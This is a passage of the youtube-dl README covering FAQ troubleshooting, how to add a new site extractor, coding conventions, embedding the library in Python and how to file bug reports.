CAPTCHA test if you download too much. We're [considering to provide a way to let you solve the CAPTCHA](https://github.com/ytdl-org/youtube-dl/issues/154), but at the moment, your best course of action is pointing a web browser to the youtube URL, solving the CAPTCHA, and restart youtube-dl. ### Do I need any other programs? youtube-dl works fine on its own on most sites. However, if you want to convert video/audio, you'll need [avconv](https://libav.org/) or [ffmpeg](https://www.ffmpeg.org/). On some sites - most notably YouTube - videos can be retrieved in a higher quality format without sound. youtube-dl will detect whether avconv/ffmpeg is present and automatically pick the best option. Videos or video formats streamed via RTMP protocol can only be downloaded when [rtmpdump](https://rtmpdump.mplayerhq.hu/) is installed. Downloading MMS and RTSP videos requires either [mplayer](https://mplayerhq.hu/) or [mpv](https://mpv.io/) to be installed. ### I have downloaded a video but how can I play it? Once the video is fully downloaded, use any video player, such as [mpv](https://mpv.io/), [vlc](https://www.videolan.org/) or [mplayer](https://www.mplayerhq.hu/). ### I extracted a video URL with `-g`, but it does not play on another machine / in my web browser. It depends a lot on the service. In many cases, requests for the video (to download/play it) must come from the same IP address and with the same cookies and/or HTTP headers. Use the `--cookies` option to write the required cookies into a file, and advise your downloader to read cookies from that file. Some sites also require a common user agent to be used, use `--dump-user-agent` to see the one in use by youtube-dl. You can also get necessary cookies and HTTP headers from JSON output obtained with `--dump-json`. It may be beneficial to use IPv6; in some cases, the restrictions are only applied to IPv4. Some services (sometimes only for a subset of videos) do not restrict the video URL by IP address, cookie, or user-agent, but these are the exception rather than the rule. Please bear in mind that some URL protocols are **not** supported by browsers out of the box, including RTMP. If you are using `-g`, your own downloader must support these as well. If you want to play the video on a machine that is not running youtube-dl, you can relay the video content from the machine that runs youtube-dl. You can use `-o -` to let youtube-dl stream a video to stdout, or simply allow the player to download the files written by youtube-dl in turn. ### ERROR: no fmt_url_map or conn information found in video info YouTube has switched to a new video info format in July 2011 which is not supported by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl. ### ERROR: unable to download video YouTube requires an additional signature since September 2012 which is not supported by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl. ### Video URL contains an ampersand and I'm getting some strange output `[1] 2839` or `'v' is not recognized as an internal or external command` That's actually the output from your shell. Since ampersand is one of the special shell characters it's interpreted by the shell preventing you from passing the whole URL to youtube-dl. To disable your shell from interpreting the ampersands (or any other special characters) you have to either put the whole URL in quotes or escape them with a backslash (which approach will work depends on your shell). For example if your URL is https://www.youtube.com/watch?t=4&v=BaW_jenozKc you should end up with following command: ```youtube-dl 'https://www.youtube.com/watch?t=4&v=BaW_jenozKc'``` or ```youtube-dl https://www.youtube.com/watch?t=4\&v=BaW_jenozKc``` For Windows you have to use the double quotes: ```youtube-dl "https://www.youtube.com/watch?t=4&v=BaW_jenozKc"``` ### ExtractorError: Could not find JS function u'OF' In February 2015, the new YouTube player contained a character sequence in a string that was misinterpreted by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl. ### HTTP Error 429: Too Many Requests or 402: Payment Required These two error codes indicate that the service is blocking your IP address because of overuse. Contact the service and ask them to unblock your IP address, or - if you have acquired a whitelisted IP address already - use the [`--proxy` or `--source-address` options](#network-options) to select another IP address. ### SyntaxError: Non-ASCII character The error File "youtube-dl", line 2 SyntaxError: Non-ASCII character '\x93' ... means you're using an outdated version of Python. Please update to Python 2.6 or 2.7. ### What is this binary file? Where has the code gone? Since June 2012 ([#342](https://github.com/ytdl-org/youtube-dl/issues/342)) youtube-dl is packed as an executable zipfile, simply unzip it (might need renaming to `youtube-dl.zip` first on some systems) or clone the git repository, as laid out above. If you modify the code, you can run it by executing the `__main__.py` file. To recompile the executable, run `make youtube-dl`. ### The exe throws an error due to missing `MSVCR100.dll` To run the exe you need to install first the [Microsoft Visual C++ 2010 Redistributable Package (x86)](https://www.microsoft.com/en-US/download/details.aspx?id=5555). ### On Windows, how should I set up ffmpeg and youtube-dl? Where should I put the exe files? If you put youtube-dl and ffmpeg in the same directory that you're running the command from, it will work, but that's rather cumbersome. To make a different directory work - either for ffmpeg, or for youtube-dl, or for both - simply create the directory (say, `C:\bin`, or `C:\Users\<User name>\bin`), put all the executables directly in there, and then [set your PATH environment variable](https://www.java.com/en/download/help/path.xml) to include that directory. From then on, after restarting your shell, you will be able to access both youtube-dl and ffmpeg (and youtube-dl will be able to find ffmpeg) by simply typing `youtube-dl` or `ffmpeg`, no matter what directory you're in. ### How do I put downloads into a specific folder? Use the `-o` to specify an [output template](#output-template), for example `-o "/home/user/videos/%(title)s-%(id)s.%(ext)s"`. If you want this for all of your downloads, put the option into your [configuration file](#configuration). ### How do I download a video starting with a `-`? Either prepend `https://www.youtube.com/watch?v=` or separate the ID from the options with `--`: youtube-dl -- -wNyEUrxzFU youtube-dl "https://www.youtube.com/watch?v=-wNyEUrxzFU" ### How do I pass cookies to youtube-dl? Use the `--cookies` option, for example `--cookies /path/to/cookies/file.txt`. In order to extract cookies from browser use any conforming browser extension for exporting cookies. For example, [cookies.txt](https://chrome.google.com/webstore/detail/cookiestxt/njabckikapfpffapmjgojcnbfjonfjfg) (for Chrome) or [cookies.txt](https://addons.mozilla.org/en-US/firefox/addon/cookies-txt/) (for Firefox). Note that the cookies file must be in Mozilla/Netscape format and the first line of the cookies file must be either `# HTTP Cookie File` or `# Netscape HTTP Cookie File`. Make sure you have correct [newline format](https://en.wikipedia.org/wiki/Newline) in the cookies file and convert newlines if necessary to correspond with your OS, namely `CRLF` (`\r\n`) for Windows and `LF` (`\n`) for Unix and Unix-like systems (Linux, macOS, etc.). `HTTP Error 400: Bad Request` when using `--cookies` is a good sign of invalid newline format. Passing cookies to youtube-dl is a good way to workaround login when a particular extractor does not implement it explicitly. Another use case is working around [CAPTCHA](https://en.wikipedia.org/wiki/CAPTCHA) some websites require you to solve in particular cases in order to get access (e.g. YouTube, CloudFlare). ### How do I stream directly to media player? You will first need to tell youtube-dl to stream media to stdout with `-o -`, and also tell your media player to read from stdin (it must be capable of this for streaming) and then pipe former to latter. For example, streaming to [vlc](https://www.videolan.org/) can be achieved with: youtube-dl -o - "https://www.youtube.com/watch?v=BaW_jenozKcj" | vlc - ### How do I download only new videos from a playlist? Use download-archive feature. With this feature you should initially download the complete playlist with `--download-archive /path/to/download/archive/file.txt` that will record identifiers of all the videos in a special file. Each subsequent run with the same `--download-archive` will download only new videos and skip all videos that have been downloaded before. Note that only successful downloads are recorded in the file. For example, at first, youtube-dl --download-archive archive.txt "https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re" will download the complete `PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re` playlist and create a file `archive.txt`. Each subsequent run will only download new videos if any: youtube-dl --download-archive archive.txt "https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re" ### Should I add `--hls-prefer-native` into my config? When youtube-dl detects an HLS video, it can download it either with the built-in downloader or ffmpeg. Since many HLS streams are slightly invalid and ffmpeg/youtube-dl each handle some invalid cases better than the other, there is an option to switch the downloader if needed. When youtube-dl knows that one particular downloader works better for a given website, that downloader will be picked. Otherwise, youtube-dl will pick the best downloader for general compatibility, which at the moment happens to be ffmpeg. This choice may change in future versions of youtube-dl, with improvements of the built-in downloader and/or ffmpeg. In particular, the generic extractor (used when your website is not in the [list of supported sites by youtube-dl](https://ytdl-org.github.io/youtube-dl/supportedsites.html) cannot mandate one specific downloader. If you put either `--hls-prefer-native` or `--hls-prefer-ffmpeg` into your configuration, a different subset of videos will fail to download correctly. Instead, it is much better to [file an issue](https://yt-dl.org/bug) or a pull request which details why the native or the ffmpeg HLS downloader is a better choice for your use case. ### Can you add support for this anime video site, or site which shows current movies for free? As a matter of policy (as well as legality), youtube-dl does not include support for services that specialize in infringing copyright. As a rule of thumb, if you cannot easily find a video that the service is quite obviously allowed to distribute (i.e. that has been uploaded by the creator, the creator's distributor, or is published under a free license), the service is probably unfit for inclusion to youtube-dl. A note on the service that they don't host the infringing content, but just link to those who do, is evidence that the service should **not** be included into youtube-dl. The same goes for any DMCA note when the whole front page of the service is filled with videos they are not allowed to distribute. A "fair use" note is equally unconvincing if the service shows copyright-protected videos in full without authorization. Support requests for services that **do** purchase the rights to distribute their content are perfectly fine though. If in doubt, you can simply include a source that mentions the legitimate purchase of content. ### How can I speed up work on my issue? (Also known as: Help, my important issue not being solved!) The youtube-dl core developer team is quite small. While we do our best to solve as many issues as possible, sometimes that can take quite a while. To speed up your issue, here's what you can do: First of all, please do report the issue [at our issue tracker](https://yt-dl.org/bugs). That allows us to coordinate all efforts by users and developers, and serves as a unified point. Unfortunately, the youtube-dl project has grown too large to use personal email as an effective communication channel. Please read the [bug reporting instructions](#bugs) below. A lot of bugs lack all the necessary information. If you can, offer proxy, VPN, or shell access to the youtube-dl developers. If you are able to, test the issue from multiple computers in multiple countries to exclude local censorship or misconfiguration issues. If nobody is interested in solving your issue, you are welcome to take matters into your own hands and submit a pull request (or coerce/pay somebody else to do so). Feel free to bump the issue from time to time by writing a small comment ("Issue is still present in youtube-dl version ...from France, but fixed from Belgium"), but please not more than once a month. Please do not declare your issue as `important` or `urgent`. ### How can I detect whether a given URL is supported by youtube-dl? For one, have a look at the [list of supported sites](docs/supportedsites.md). Note that it can sometimes happen that the site changes its URL scheme (say, from https://example.com/video/1234567 to https://example.com/v/1234567 ) and youtube-dl reports an URL of a service in that list as unsupported. In that case, simply report a bug. It is *not* possible to detect whether a URL is supported or not. That's because youtube-dl contains a generic extractor which matches **all** URLs. You may be tempted to disable, exclude, or remove the generic extractor, but the generic extractor not only allows users to extract videos from lots of websites that embed a video from another service, but may also be used to extract video from a service that it's hosting itself. Therefore, we neither recommend nor support disabling, excluding, or removing the generic extractor. If you want to find out whether a given URL is supported, simply call youtube-dl with it. If you get no videos back, chances are the URL is either not referring to a video or unsupported. You can find out which by examining the output (if you run youtube-dl on the console) or catching an `UnsupportedError` exception if you run it from a Python program. # Why do I need to go through that much red tape when filing bugs? Before we had the issue template, despite our extensive [bug reporting instructions](#bugs), about 80% of the issue reports we got were useless, for instance because people used ancient versions hundreds of releases old, because of simple syntactic errors (not in youtube-dl but in general shell usage), because the problem was already reported multiple times before, because people did not actually read an error message, even if it said "please install ffmpeg", because people did not mention the URL they were trying to download and many more simple, easy-to-avoid problems, many of whom were totally unrelated to youtube-dl. youtube-dl is an open-source project manned by too few volunteers, so we'd rather spend time fixing bugs where we are certain none of those simple problems apply, and where we can be reasonably confident to be able to reproduce the issue without asking the reporter repeatedly. As such, the output of `youtube-dl -v YOUR_URL_HERE` is really all that's required to file an issue. The issue template also guides you through some basic steps you can do, such as checking that your version of youtube-dl is current. # DEVELOPER INSTRUCTIONS Most users do not need to build youtube-dl and can [download the builds](https://ytdl-org.github.io/youtube-dl/download.html) or get them from their distribution. To run youtube-dl as a developer, you don't need to build anything either. Simply execute python -m youtube_dl To run the test, simply invoke your favorite test runner, or execute a test file directly; any of the following work: python -m unittest discover python test/test_download.py nosetests See item 6 of [new extractor tutorial](#adding-support-for-a-new-site) for how to run extractor specific test cases. If you want to create a build of youtube-dl yourself, you'll need * python * make (only GNU make is supported) * pandoc * zip * nosetests ### Adding support for a new site If you want to add support for a new site, first of all **make sure** this site is **not dedicated to [copyright infringement](README.md#can-you-add-support-for-this-anime-video-site-or-site-which-shows-current-movies-for-free)**. youtube-dl does **not support** such sites thus pull requests adding support for them **will be rejected**. After you have ensured this site is distributing its content legally, you can follow this quick list (assuming your service is called `yourextractor`): 1. [Fork this repository](https://github.com/ytdl-org/youtube-dl/fork) 2. Check out the source code with: git clone [email protected]:YOUR_GITHUB_USERNAME/youtube-dl.git 3. Start a new git branch with cd youtube-dl git checkout -b yourextractor 4. Start with this simple template and save it to `youtube_dl/extractor/yourextractor.py`: ```python # coding: utf-8 from __future__ import unicode_literals from .common import InfoExtractor class YourExtractorIE(InfoExtractor): _VALID_URL = r'https?://(?:www\.)?yourextractor\.com/watch/(?P<id>[0-9]+)' _TEST = { 'url': 'https://yourextractor.com/watch/42', 'md5': 'TODO: md5 sum of the first 10241 bytes of the video file (use --test)', 'info_dict': { 'id': '42', 'ext': 'mp4', 'title': 'Video title goes here', 'thumbnail': r're:^https?://.*\.jpg$', # TODO more properties, either as: # * A value # * MD5 checksum; start the string with md5: # * A regular expression; start the string with re: # * Any Python type (for example int or float) } } def _real_extract(self, url): video_id = self._match_id(url) webpage = self._download_webpage(url, video_id) # TODO more code goes here, for example ... title = self._html_search_regex(r'<h1>(.+?)</h1>', webpage, 'title') return { 'id': video_id, 'title': title, 'description': self._og_search_description(webpage), 'uploader': self._search_regex(r'<div[^>]+id="uploader"[^>]*>([^<]+)<', webpage, 'uploader', fatal=False), # TODO more properties (see youtube_dl/extractor/common.py) } ``` 5. Add an import in [`youtube_dl/extractor/extractors.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/extractor/extractors.py). 6. Run `python test/test_download.py TestDownload.test_YourExtractor`. This *should fail* at first, but you can continually re-run it until you're done. If you decide to add more than one test, then rename ``_TEST`` to ``_TESTS`` and make it into a list of dictionaries. The tests will then be named `TestDownload.test_YourExtractor`, `TestDownload.test_YourExtractor_1`, `TestDownload.test_YourExtractor_2`, etc. Note that tests with `only_matching` key in test's dict are not counted in. 7. Have a look at [`youtube_dl/extractor/common.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/extractor/common.py) for possible helper methods and a [detailed description of what your extractor should and may return](https://github.com/ytdl-org/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L94-L303). Add tests and code for as many as you want. 8. Make sure your code follows [youtube-dl coding conventions](#youtube-dl-coding-conventions) and check the code with [flake8](http://flake8.pycqa.org/en/latest/index.html#quickstart): $ flake8 youtube_dl/extractor/yourextractor.py 9. Make sure your code works under all [Python](https://www.python.org/) versions claimed supported by youtube-dl, namely 2.6, 2.7, and 3.2+. 10. When the tests pass, [add](https://git-scm.com/docs/git-add) the new files and [commit](https://git-scm.com/docs/git-commit) them and [push](https://git-scm.com/docs/git-push) the result, like this: $ git add youtube_dl/extractor/extractors.py $ git add youtube_dl/extractor/yourextractor.py $ git commit -m '[yourextractor] Add new extractor' $ git push origin yourextractor 11. Finally, [create a pull request](https://help.github.com/articles/creating-a-pull-request). We'll then review and merge it. In any case, thank you very much for your contributions! ## youtube-dl coding conventions This section introduces a guide lines for writing idiomatic, robust and future-proof extractor code. Extractors are very fragile by nature since they depend on the layout of the source data provided by 3rd party media hosters out of your control and this layout tends to change. As an extractor implementer your task is not only to write code that will extract media links and metadata correctly but also to minimize dependency on the source's layout and even to make the code foresee potential future changes and be ready for that. This is important because it will allow the extractor not to break on minor layout changes thus keeping old youtube-dl versions working. Even though this breakage issue is easily fixed by emitting a new version of youtube-dl with a fix incorporated, all the previous versions become broken in all repositories and distros' packages that may not be so prompt in fetching the update from us. Needless to say, some non rolling release distros may never receive an update at all. ### Mandatory and optional metafields For extraction to work youtube-dl relies on metadata your extractor extracts and provides to youtube-dl expressed by an [information dictionary](https://github.com/ytdl-org/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L94-L303) or simply *info dict*. Only the following meta fields in the *info dict* are considered mandatory for a successful extraction process by youtube-dl: - `id` (media identifier) - `title` (media title) - `url` (media download URL) or `formats` In fact only the last option is technically mandatory (i.e. if you can't figure out the download location of the media the extraction does not make any sense). But by convention youtube-dl also treats `id` and `title` as mandatory. Thus the aforementioned metafields are the critical data that the extraction does not make any sense without and if any of them fail to be extracted then the extractor is considered completely broken. [Any field](https://github.com/ytdl-org/youtube-dl/blob/7f41a598b3fba1bcab2817de64a08941200aa3c8/youtube_dl/extractor/common.py#L188-L303) apart from the aforementioned ones are considered **optional**. That means that extraction should be **tolerant** to situations when sources for these fields can potentially be unavailable (even if they are always available at the moment) and **future-proof** in order not to break the extraction of general purpose mandatory fields. #### Example Say you have some source dictionary `meta` that you've fetched as JSON with HTTP request and it has a key `summary`: ```python meta = self._download_json(url, video_id) ``` Assume at this point `meta`'s layout is: ```python { ... "summary": "some fancy summary text", ... } ``` Assume you want to extract `summary` and put it into the resulting info dict as `description`. Since `description` is an optional meta field you should be ready that this key may be missing from the `meta` dict, so that you should extract it like: ```python description = meta.get('summary') # correct ``` and not like: ```python description = meta['summary'] # incorrect ``` The latter will break extraction process with `KeyError` if `summary` disappears from `meta` at some later time but with the former approach extraction will just go ahead with `description` set to `None` which is perfectly fine (remember `None` is equivalent to the absence of data). Similarly, you should pass `fatal=False` when extracting optional data from a webpage with `_search_regex`, `_html_search_regex` or similar methods, for instance: ```python description = self._search_regex( r'<span[^>]+id="title"[^>]*>([^<]+)<', webpage, 'description', fatal=False) ``` With `fatal` set to `False` if `_search_regex` fails to extract `description` it will emit a warning and continue extraction. You can also pass `default=<some fallback value>`, for example: ```python description = self._search_regex( r'<span[^>]+id="title"[^>]*>([^<]+)<', webpage, 'description', default=None) ``` On failure this code will silently continue the extraction with `description` set to `None`. That is useful for metafields that may or may not be present. ### Provide fallbacks When extracting metadata try to do so from multiple sources. For example if `title` is present in several places, try extracting from at least some of them. This makes it more future-proof in case some of the sources become unavailable. #### Example Say `meta` from the previous example has a `title` and you are about to extract it. Since `title` is a mandatory meta field you should end up with something like: ```python title = meta['title'] ``` If `title` disappears from `meta` in future due to some changes on the hoster's side the extraction would fail since `title` is mandatory. That's expected. Assume that you have some another source you can extract `title` from, for example `og:title` HTML meta of a `webpage`. In this case you can provide a fallback scenario: ```python title = meta.get('title') or self._og_search_title(webpage) ``` This code will try to extract from `meta` first and if it fails it will try extracting `og:title` from a `webpage`. ### Regular expressions #### Don't capture groups you don't use Capturing group must be an indication that it's used somewhere in the code. Any group that is not used must be non capturing. ##### Example Don't capture id attribute name here since you can't use it for anything anyway. Correct: ```python r'(?:id|ID)=(?P<id>\d+)' ``` Incorrect: ```python r'(id|ID)=(?P<id>\d+)' ``` #### Make regular expressions relaxed and flexible When using regular expressions try to write them fuzzy, relaxed and flexible, skipping insignificant parts that are more likely to change, allowing both single and double quotes for quoted values and so on. ##### Example Say you need to extract `title` from the following HTML code: ```html <span style="position: absolute; left: 910px; width: 90px; float: right; z-index: 9999;" class="title">some fancy title</span> ``` The code for that task should look similar to: ```python title = self._search_regex( r'<span[^>]+class="title"[^>]*>([^<]+)', webpage, 'title') ``` Or even better: ```python title = self._search_regex( r'<span[^>]+class=(["\'])title\1[^>]*>(?P<title>[^<]+)', webpage, 'title', group='title') ``` Note how you tolerate potential changes in the `style` attribute's value or switch from using double quotes to single for `class` attribute: The code definitely should not look like: ```python title = self._search_regex( r'<span style="position: absolute; left: 910px; width: 90px; float: right; z-index: 9999;" class="title">(.*?)</span>', webpage, 'title', group='title') ``` ### Long lines policy There is a soft limit to keep lines of code under 80 characters long. This means it should be respected if possible and if it does not make readability and code maintenance worse. For example, you should **never** split long string literals like URLs or some other often copied entities over multiple lines to fit this limit: Correct: ```python 'https://www.youtube.com/watch?v=FqZTN594JQw&list=PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4' ``` Incorrect: ```python 'https://www.youtube.com/watch?v=FqZTN594JQw&list=' 'PLMYEtVRpaqY00V9W81Cwmzp6N6vZqfUKD4' ``` ### Inline values Extracting variables is acceptable for reducing code duplication and improving readability of complex expressions. However, you should avoid extracting variables used only once and moving them to opposite parts of the extractor file, which makes reading the linear flow difficult. #### Example Correct: ```python title = self._html_search_regex(r'<title>([^<]+)</title>', webpage, 'title') ``` Incorrect: ```python TITLE_RE = r'<title>([^<]+)</title>' # ...some lines of code... title = self._html_search_regex(TITLE_RE, webpage, 'title') ``` ### Collapse fallbacks Multiple fallback values can quickly become unwieldy. Collapse multiple fallback values into a single expression via a list of patterns. #### Example Good: ```python description = self._html_search_meta( ['og:description', 'description', 'twitter:description'], webpage, 'description', default=None) ``` Unwieldy: ```python description = ( self._og_search_description(webpage, default=None) or self._html_search_meta('description', webpage, default=None) or self._html_search_meta('twitter:description', webpage, default=None)) ``` Methods supporting list of patterns are: `_search_regex`, `_html_search_regex`, `_og_search_property`, `_html_search_meta`. ### Trailing parentheses Always move trailing parentheses after the last argument. #### Example Correct: ```python lambda x: x['ResultSet']['Result'][0]['VideoUrlSet']['VideoUrl'], list) ``` Incorrect: ```python lambda x: x['ResultSet']['Result'][0]['VideoUrlSet']['VideoUrl'], list, ) ``` ### Use convenience conversion and parsing functions Wrap all extracted numeric data into safe functions from [`youtube_dl/utils.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/utils.py): `int_or_none`, `float_or_none`. Use them for string to number conversions as well. Use `url_or_none` for safe URL processing. Use `try_get` for safe metadata extraction from parsed JSON. Use `unified_strdate` for uniform `upload_date` or any `YYYYMMDD` meta field extraction, `unified_timestamp` for uniform `timestamp` extraction, `parse_filesize` for `filesize` extraction, `parse_count` for count meta fields extraction, `parse_resolution`, `parse_duration` for `duration` extraction, `parse_age_limit` for `age_limit` extraction. Explore [`youtube_dl/utils.py`](https://github.com/ytdl-org/youtube-dl/blob/master/youtube_dl/utils.py) for more useful convenience functions. #### More examples ##### Safely extract optional description from parsed JSON ```python description = try_get(response, lambda x: x['result']['video'][0]['summary'], compat_str) ``` ##### Safely extract more optional metadata ```python video = try_get(response, lambda x: x['result']['video'][0], dict) or {} description = video.get('summary') duration = float_or_none(video.get('durationMs'), scale=1000) view_count = int_or_none(video.get('views')) ``` # EMBEDDING YOUTUBE-DL youtube-dl makes the best effort to be a good command-line program, and thus should be callable from any programming language. If you encounter any problems parsing its output, feel free to [create a report](https://github.com/ytdl-org/youtube-dl/issues/new). From a Python program, you can embed youtube-dl in a more powerful fashion, like this: ```python from __future__ import unicode_literals import youtube_dl ydl_opts = {} with youtube_dl.YoutubeDL(ydl_opts) as ydl: ydl.download(['https://www.youtube.com/watch?v=BaW_jenozKc']) ``` Most likely, you'll want to use various options. For a list of options available, have a look at [`youtube_dl/YoutubeDL.py`](https://github.com/ytdl-org/youtube-dl/blob/3e4cedf9e8cd3157df2457df7274d0c842421945/youtube_dl/YoutubeDL.py#L137-L312). For a start, if you want to intercept youtube-dl's output, set a `logger` object. Here's a more complete example of a program that outputs only errors (and a short message after the download is finished), and downloads/converts the video to an mp3 file: ```python from __future__ import unicode_literals import youtube_dl class MyLogger(object): def debug(self, msg): pass def warning(self, msg): pass def error(self, msg): print(msg) def my_hook(d): if d['status'] == 'finished': print('Done downloading, now converting ...') ydl_opts = { 'format': 'bestaudio/best', 'postprocessors': [{ 'key': 'FFmpegExtractAudio', 'preferredcodec': 'mp3', 'preferredquality': '192', }], 'logger': MyLogger(), 'progress_hooks': [my_hook], } with youtube_dl.YoutubeDL(ydl_opts) as ydl: ydl.download(['https://www.youtube.com/watch?v=BaW_jenozKc']) ``` # BUGS Bugs and suggestions should be reported at: <https://github.com/ytdl-org/youtube-dl/issues>. Unless you were prompted to or there is another pertinent reason (e.g. GitHub fails to accept the bug report), please do not send bug reports via personal email. For discussions, join us in the IRC channel [#youtube-dl](irc://chat.freenode.net/#youtube-dl) on freenode ([webchat](https://webchat.freenode.net/?randomnick=1&channels=youtube-dl)). **Please include the full output of youtube-dl when run with `-v`**, i.e. **add** `-v` flag to **your command line**, copy the **whole** output and post it in the issue body wrapped in \`\`\` for better formatting. It should look similar to this: ``` $ youtube-dl -v <your command line> [debug] System config: [] [debug] User config: [] [debug] Command-line args: [u'-v', u'https://www.youtube.com/watch?v=BaW_jenozKcj'] [debug] Encodings: locale cp1251, fs mbcs, out cp866, pref cp1251 [debug] youtube-dl version 2015.12.06 [debug] Git HEAD: 135392e [debug] Python version 2.6.6 - Windows-2003Server-5.2.3790-SP2 [debug] exe versions: ffmpeg N-75573-g1d0487f, ffprobe N-75573-g1d0487f, rtmpdump 2.4 [debug] Proxy map: {} ... ``` **Do not post screenshots of verbose logs; only plain text is acceptable.** The output (including the first lines) contains important debugging information. Issues without the full output are often not reproducible and therefore do not get solved in short order, if ever. Please re-read your issue once again to avoid a couple of common mistakes (you can and should use this as a checklist): ### Is the description of the issue itself sufficient? We often get issue reports that we cannot really decipher. While in most cases we eventually get the required information after asking back multiple times, this poses an unnecessary drain on our resources. Many contributors, including myself, are also not native speakers, so we may misread some parts. So please elaborate on what feature you are requesting, or what bug you want to be fixed. Make sure that it's obvious - What the problem is - How it could be fixed - How your proposed solution would look like If your report is shorter than two lines, it is almost certainly missing some of these, which makes it hard for us to respond to it. We're often too polite to close the issue outright, but the missing info makes misinterpretation likely. As a committer myself, I often get frustrated by these issues, since the only possible way for me to move forward on them is to ask for clarification over and over. For bug reports, this means that your report should contain the *complete* output of youtube-dl when called with the `-v` flag. The error message you get for (most) bugs even says so, but you would not believe how many of our bug reports do not contain this information. If your server has multiple IPs or you suspect censorship, adding `--call-home` may be a good idea to get more diagnostics. If the error is `ERROR: Unable to extract ...` and you cannot reproduce it from multiple countries, add `--dump-pages` (warning: this will yield a rather large output, redirect it to the file `log.txt` by adding `>log.txt 2>&1` to your command-line) or upload the `.dump` files you get when you add `--write-pages` [somewhere](https://gist.github.com/). **Site support requests must contain an example URL**. An example URL is a URL you might want to download, like `https://www.youtube.com/watch?v=BaW_jenozKc`. There should be an obvious video present. Except under very special circumstances, the main page of a video service (e.g. `https://www.youtube.com/`) is *not* an example URL. ### Are you using the latest version? Before reporting any issue, type `youtube-dl -U`. This should report that you're up-to-date. About 20% of the reports we receive are already fixed, but people are using outdated versions. This goes for feature requests as well. ### Is the issue already documented? Make sure that someone has not already opened the issue you're trying to open. Search at the top of the window or browse the [GitHub Issues](https://github.com/ytdl-org/youtube-dl/search?type=Issues) of this repository. If there is an issue, feel free to write something along the lines of "This affects me as well, with version 2015.01.01. Here is some more information on the issue: ...". While some issues may be old, a new post into them often spurs rapid activity. ### Why are existing options not enough? Before requesting a new feature, please have a quick peek at [the list of supported options](https://github.com/ytdl-org/youtube-dl/blob/master/README.md#options). Many feature requests are for features that actually exist already! Please, absolutely do show off your work in the issue report and detail how the existing similar options do *not* solve your problem. ### Is there enough context in your bug report? People want to solve problems, and often think they do us a favor by breaking down their larger problems (e.g. wanting to skip already downloaded files) to a specific request (e.g. requesting us to look whether the file exists before downloading the info page). However, what often happens is that they break down the problem into two steps: One simple, and one impossible (or extremely complicated one). We are then presented with a very complicated request when the original problem could be solved far easier, e.g. by recording the downloaded video IDs in a separate file. To avoid this, you must include the greater context where it is non-obvious. In particular, every feature request that does not consist of adding support for a new site should contain a use case scenario that explains in what situation the missing feature would be useful. ### Does the issue involve one problem, and one problem only? Some of our users seem to think there is a limit of issues they can or should open. There is no limit of issues they can or should open. While it may seem appealing to be able to dump all your issues into one ticket, that means that someone who solves one of your issues cannot mark the issue as closed. Typically, reporting a bunch of issues leads to the ticket lingering since nobody wants to attack that behemoth, until someone mercifully splits the issue into multiple ones. In particular, every site support request issue should only pertain to services at one site (generally under a common domain, but always using the same backend technology). Do not request support for vimeo user videos, White house podcasts, and Google Plus pages in the same issue. Also, make sure that you don't post bug reports alongside feature requests. As a rule of thumb, a feature request does not include outputs of youtube-dl that are not immediately related to the feature at hand. Do not post reports of a network error alongside the request for a new video service. ### Is anyone going to need the feature? Only post features that you (or an incapacitated friend you can personally talk to) require. Do not post features because they seem like a good idea. If they are really useful, they will be requested by someone who requires them. ### Is your question about youtube-dl? It may sound strange, but some bug reports we receive are completely unrelated to youtube-dl and relate to a different, or even the reporter's own, application. Please make sure that you are actually using youtube-dl. If you are using a UI for youtube-dl, report the bug to the maintainer of the actual application providing the UI. On the other hand, if your UI for youtube-dl fails in some way you believe is related to youtube-dl, by all means, go ahead and report the bug. # COPYRIGHT youtube-dl is released into the public domain by the copyright holders. This README file was originally written by [Daniel Bolton](https://github.com/dbbolton) and is likewise released into the public domain.
